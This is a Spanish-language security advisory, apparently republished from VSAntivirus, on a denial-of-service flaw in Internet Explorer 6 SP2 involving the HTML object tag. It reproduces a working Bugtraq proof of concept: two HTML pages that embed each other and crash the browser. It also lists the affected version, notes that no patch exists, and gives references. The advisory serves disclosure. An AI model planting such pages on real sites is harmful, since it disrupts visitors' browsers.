DoS en Internet Explorer producido por "Object Data"Se ha reportado que Microsoft Internet Explorer es afectado por una vulnerabilidad del tipo denegación de servicio (DoS).
La vulnerabilidad se presenta cuando el navegador maneja páginas Web embebidas utilizando la etiqueta HTML "Object Data".
El fallo afecta a Microsoft Internet Explorer 6 SP2, con todas las actualizaciones a la fecha de este aviso.
Bugtraq ha publicado la siguiente prueba de concepto:
Página #1 (grabar como "btf1.htm"):
<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf2.htm" width="0" height="0"></object>
</body></html>
Página #2 (grabar como "btf2.htm"):
<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf1.htm" width="0" height="0"></object>
</body></html>
Software vulnerable:- Microsoft Internet Explorer 6.0 SP2 (y posiblemente anteriores)
Soluciones:Actualmente no existen parches para este problema.
Créditos:
Benjamin Tobias Franz <
[email protected]>
Referencias:
- Identificado en BugTraq como ID 13800
Microsoft Internet Explorer Object Embedding Denial of Service Vulnerability
http://www.securityfocus.com/bid/13800/- Referencia en FrSIRT: FrSIRT/ADV-2005-0646
Microsoft Internet Explorer Denial of Service Vulnerabilities
http://www.frsirt.com/english/advisories/2005/0646 Publicado en:
http://www.vsantivirus.com/vul-iesp2-objectdata-280505.htm